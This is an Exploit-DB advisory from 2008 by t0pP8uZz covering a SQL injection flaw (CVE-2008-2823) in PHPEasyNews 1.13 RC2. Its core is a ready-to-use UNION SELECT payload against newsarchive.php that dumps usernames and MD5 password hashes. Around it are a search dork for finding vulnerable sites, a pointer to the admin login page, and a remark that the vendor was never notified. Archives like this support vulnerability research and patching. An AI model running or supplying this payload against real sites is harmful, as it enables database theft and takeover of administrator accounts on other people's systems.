PHPEasyNews <= 1.13 RC2 post Remote SQL Injection Vulnerability

2008-06-14T00:00:00
ID EDB-ID:5820
Type exploitdb
Reporter t0pP8uZz
Modified 2008-06-14T00:00:00

Description

PHPEasyNews <= 1.13 RC2 (post) Remote SQL Injection Vulnerability. CVE-2008-2823. Webapps exploit for php platform

                                        
                                            -[*]+================================================================================+[*]-
-[*]+		   PHPEasyNews &lt;= 1.13 RC2 SQL Injection Vulnerabilitys	             +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 4 JUNE 2008
[*] Script Download: http://brettjenkins.co.uk
[*] DORK: "PHPeasynews"  (no stable dork, diff versions use diff text)



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION: 

	PHPEasyNews suffers from a insecure mysql query, this allows the remote attacker to
	arbitrary pull information from the database. thus allowing to login has admin,
	and possibly gaining a shell.

	the injection returns multi data, so it will show all users, the first is normally the admin.



[*] SQL Injection:

	http://site.com/newsarchive.php?post=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/**/FROM/**/pen_users/*



[*] NOTE/TIP: 

	admin login is at "admin.php"

	all passwords are encrypted in MD5.



[*] GREETZ: 

	milw0rm.com, h4ck-y0u.org, CipherCrew !



[-] peace, 

	t0pP8uZz



-[*]+================================================================================+[*]-
-[*]+		   PHPEasyNews &lt;= 1.13 RC2 SQL Injection Vulnerabilitys	             +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-14]